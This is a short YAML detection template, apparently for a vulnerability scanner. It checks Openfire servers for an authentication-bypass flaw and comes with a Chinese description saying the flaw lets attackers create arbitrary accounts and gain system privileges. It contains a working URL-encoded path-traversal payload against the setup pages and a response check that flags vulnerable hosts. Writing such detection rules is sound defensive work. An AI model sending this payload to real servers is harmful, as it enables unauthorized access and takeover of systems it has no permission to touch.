keyword: openfire
name: Openfire身份认证绕过
description: |
  Openfire 服务器存在身份认证绕过漏洞，攻击者通过构造特定 URL 链接以 GET 请求发送至漏洞服务器中，即可创建任意账户，进而获取系统权限。
requests:
  path: "/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp"
  method: GET
  headers:
    User-agent: 
    Content-length: 
    Accept: 
    Content-type: 
    Accept-Encoding: 
    Cookie: 
    Referer: 
    X-Forwarded-For: 
  body-raw: |-

response: 
  status-code: 200
  body: "line"
  headers:
    Server: 
    Content-type: 
    Content-length: 
    Date: 
    Connection: 
impact: |
  攻击者可以通过利用此漏洞在 Openfire 服务器上创建任意账户，并获取系统权限。